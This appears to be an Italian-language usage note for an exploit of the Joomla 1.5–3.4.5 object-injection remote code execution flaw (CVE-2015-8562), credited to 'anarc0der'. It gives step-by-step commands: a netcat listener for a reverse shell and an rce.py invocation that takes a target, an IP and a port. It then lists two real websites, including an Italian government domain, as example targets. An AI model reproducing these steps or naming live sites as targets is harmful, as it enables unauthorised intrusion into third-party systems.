
Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE header X-Forwarded-For:
Data vulnerabilità: 12/17/2015
Autore exploit: anarc0der
Versione: Joomla 1.5 a 3.4.5
CVE : CVE-2015-8562
Come usare:
Apri un terminale e mettiti in ascolto con nc: $ nc -lnvp 4444
Apri un altro terminale ed esegui l'exploit:
python3 rce.py --target='target' --ip='ip' --port=4444
Esempi di target PoC (Non danneggiarli, usali come esempio per altri):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/